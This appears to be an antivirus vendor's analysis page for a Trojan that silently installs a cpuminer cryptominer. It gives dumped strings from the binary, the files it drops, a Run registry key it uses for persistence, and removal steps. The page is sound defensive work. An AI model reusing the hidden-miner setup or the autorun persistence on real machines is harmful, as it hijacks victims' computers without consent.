Uninstall the newer version then run setup againIFatal error in the configuration file, examine the log file for more infouError: This product can only be installed on Windows XP or later. Windows 95, 98, ME, NT, and 2000 are not supported.@Failed to create a new thread
Error: Unsupported Bitness
`Unable to find a drive with sufficent free disk space in order to extract the installation files\Error: This product may not be installed on a computer that has Microsoft HyperV installed.oMicrosoft Runtime DLLs cannot be installed on this operating system. Please see Microsoft KB835732 for details.zYou may be running ACE instances. ACE is no longer supported in this version of VMware Player. Continue with installation?
Canceling Operation...
P/L or /lang  : Specifies a language to run the installer.R/L or /lang  : Specifies a language to run the installer.]/L or /lang  : Specifies a language to run the installer.F/L or /lang  : Specifies a language to run the installer.J/z or /var <"Key"="value" pairs> : Specify a set of variables to override.'/x or /uninst : Uninstalls the product.V/v or /msi_args <"Key"="value" pairs> : Specify a set of arguments to pass to the MSI.C/clean or /clean : Clean out installation registration information.|/nsr or /noSilentReboot : Suppress an automatic reboot after a successful silent install (does not affect installs with UI).
minerd.exe_364:
.text
``.data
.rdata
0@.bss
.idata
libgcc_s_dw2-1.dll
libgcj-12.dll
JSON decode of %s failed
http://
https://
stratum tcp://
http://%s
cpuminer 2.3.2
accepted: %lu/%lu (%.2f%%), %s khash/s %s
DEBUG: reject reason: %s
DEBUG: job_id='%s' extranonce2=%s ntime=x
Starting Stratum on %s
...terminating workio thread
...retry after %d seconds
JSON decode failed(%d): %s
{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}
{"method": "getwork", "params": [ "%s" ], "id":1}
JSON key '%s' not found
JSON key '%s' is not a string
CURL initialization failed
%s%s%s
Long-polling activated for %s
json_rpc_call failed, retry after %d seconds
DEBUG: got new work in %d ms
Binding thread %d to cpu %d
thread %d: %lu hashes, %s khash/s
Total: %s khash/s
work retrieval failed, exiting mining thread %d
http://127.0.0.1:9332/
%s: unsupported non-option argument '%s'
JSON option %s invalid
https:
%s:%s
thread %d create failed
%d miner threads started, using '%s' algorithm.
cert
userpass
-o, --url=URL URL of mining server (default: http://127.0.0.1:9332/)
-O, --userpass=U:P username:password pair for mining server
-p, --pass=PASSWORD password for mining server
--cert=FILE certificate for mining server using SSL
-x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy
--no-longpoll disable X-Long-Polling support
--no-stratum disable X-Stratum support
[%d-d-d d:d:d] %s
User-Agent: cpuminer/2.3.2
HTTP request failed: %s
JSON-RPC call failed: %s
hex2bin failed on '%s'
DEBUG: %s
Hash: %s
Target: %s
http%s
http_proxy
Stratum connection failed: %s
{"id": 1, "method": "mining.subscribe", "params": []}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}
mining.notify
Stratum session id: %s
mining.set_difficulty
client.reconnect
stratum tcp://%s:%d
Server requested reconnection to %s
client.get_version
cpuminer/2.3.2
client.show_message
MESSAGE FROM SERVER: %s
{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}
%s near '%s'
%s near end of file
unable to decode byte 0x%x at position %d
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
end == saved_text   lex->saved_text.length
unable to open %s: %s
\ux
\ux\ux
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
O%s: option requires an argument -- %c
%s: unrecognised option `-%s'
%s: invalid option -- %c
option `%s%s' doesn't accept an argument
option `%s%s' requires an argument
%s: option `%s' is ambiguous
%s: unrecognised option `%s'
1404407002 5702
curl_easy_cleanup
curl_easy_init
curl_easy_perform
curl_easy_reset
curl_easy_setopt
curl_global_init
curl_slist_append
curl_slist_free_all
curl_version
pthread_join
libcurl.dll
KERNEL32.dll
msvcrt.dll
pthreadGC2.dll
WS2_32.dll
mainCRTStartup
WinMainCRTStartup
_CRT_glob
_CRT_fmode
_CRT_MT
___w64_mingwthr_add_key_dtor
___w64_mingwthr_remove_key_dtor
wcrtomb
__mingwthr_key_t
__mingwthr_key
GNU C 4.5.2
../mingw/crt1.c
C:\MinGW\msys\1.0\src\mingwrt
__mingw_CRTStartup
../mingw/CRTglob.c
../mingw/CRTfmode.c
../mingw/CRT_fp10.c
__report_error
../mingw/crtst.c
__mingwthr_run_key_dtors
keyp
new_key
prev_key
cur_key
key_dtor_list
C:\MinGW\msys\1.0\src\mingwrt\mingwex
%flags
Þst
../../mingw/mingwex/wcrtomb.c
__wcrtomb_cp
crt1.c
CRTglob.c
CRTfmode.c
CRT_fp10.c
c:/mingw/bin/../lib/gcc/mingw32/4.5.2/include
crtst.c
wcrtomb.c
"@"@"@"@
minerd.exe_364_rwx_00400000_0004E000:
.text
``.data
.rdata
0@.bss
.idata
libgcc_s_dw2-1.dll
libgcj-12.dll
JSON decode of %s failed
http://
https://
stratum tcp://
http://%s
cpuminer 2.3.2
accepted: %lu/%lu (%.2f%%), %s khash/s %s
DEBUG: reject reason: %s
DEBUG: job_id='%s' extranonce2=%s ntime=x
Starting Stratum on %s
...terminating workio thread
...retry after %d seconds
JSON decode failed(%d): %s
{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}
{"method": "getwork", "params": [ "%s" ], "id":1}
JSON key '%s' not found
JSON key '%s' is not a string
CURL initialization failed
%s%s%s
Long-polling activated for %s
json_rpc_call failed, retry after %d seconds
DEBUG: got new work in %d ms
Binding thread %d to cpu %d
thread %d: %lu hashes, %s khash/s
Total: %s khash/s
work retrieval failed, exiting mining thread %d
http://127.0.0.1:9332/
%s: unsupported non-option argument '%s'
JSON option %s invalid
https:
%s:%s
thread %d create failed
%d miner threads started, using '%s' algorithm.
cert
userpass
-o, --url=URL URL of mining server (default: http://127.0.0.1:9332/)
-O, --userpass=U:P username:password pair for mining server
-p, --pass=PASSWORD password for mining server
--cert=FILE certificate for mining server using SSL
-x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy
--no-longpoll disable X-Long-Polling support
--no-stratum disable X-Stratum support
[%d-d-d d:d:d] %s
User-Agent: cpuminer/2.3.2
HTTP request failed: %s
JSON-RPC call failed: %s
hex2bin failed on '%s'
DEBUG: %s
Hash: %s
Target: %s
http%s
http_proxy
Stratum connection failed: %s
{"id": 1, "method": "mining.subscribe", "params": []}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}
mining.notify
Stratum session id: %s
mining.set_difficulty
client.reconnect
stratum tcp://%s:%d
Server requested reconnection to %s
client.get_version
cpuminer/2.3.2
client.show_message
MESSAGE FROM SERVER: %s
{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}
%s near '%s'
%s near end of file
unable to decode byte 0x%x at position %d
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
end == saved_text   lex->saved_text.length
unable to open %s: %s
\ux
\ux\ux
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
O%s: option requires an argument -- %c
%s: unrecognised option `-%s'
%s: invalid option -- %c
option `%s%s' doesn't accept an argument
option `%s%s' requires an argument
%s: option `%s' is ambiguous
%s: unrecognised option `%s'
1404407002 5702
curl_easy_cleanup
curl_easy_init
curl_easy_perform
curl_easy_reset
curl_easy_setopt
curl_global_init
curl_slist_append
curl_slist_free_all
curl_version
pthread_join
libcurl.dll
KERNEL32.dll
msvcrt.dll
pthreadGC2.dll
WS2_32.dll
mainCRTStartup
WinMainCRTStartup
_CRT_glob
_CRT_fmode
_CRT_MT
___w64_mingwthr_add_key_dtor
___w64_mingwthr_remove_key_dtor
wcrtomb
__mingwthr_key_t
__mingwthr_key
GNU C 4.5.2
../mingw/crt1.c
C:\MinGW\msys\1.0\src\mingwrt
__mingw_CRTStartup
../mingw/CRTglob.c
../mingw/CRTfmode.c
../mingw/CRT_fp10.c
__report_error
../mingw/crtst.c
__mingwthr_run_key_dtors
keyp
new_key
prev_key
cur_key
key_dtor_list
C:\MinGW\msys\1.0\src\mingwrt\mingwex
%flags
Þst
../../mingw/mingwex/wcrtomb.c
__wcrtomb_cp
crt1.c
CRTglob.c
CRTfmode.c
CRT_fp10.c
c:/mingw/bin/../lib/gcc/mingw32/4.5.2/include
crtst.c
wcrtomb.c
"@"@"@"@

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    0003F.tmp.exe:1500
    %original file name%.exe:1836

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Cookies\Current_User@google[2].txt (647 bytes)
    %Documents and Settings%\%current user%\Application Data\675F5D2DB02D8342A557D0A4ECB70B5C (1713 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\0003F.tmp.exe (696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\pthreadGC2.dll (695 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\google[1].htm (22921 bytes)
    %Documents and Settings%\%current user%\Application Data\31t1R8LPnv1UOeL1ygYGsn0w0VCT02Y (604 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\888256212[1].png (139281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\00040.tmp.exe (45505 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\846767599[1].png (337 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\libcurl.dll (1744 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\minerd.exe (696 bytes)
    %Documents and Settings%\%current user%\Application Data\7425110477C00FBB20E6CF9BB432D760 (1713 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\562309044[1].png (139281 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@google[1].txt (262 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\index[1].htm (896 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Startup\xncqnyyorsxlq.exe (696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe (696 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "toexrjunjmxmfsfluiznsagzgviplr" = "%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.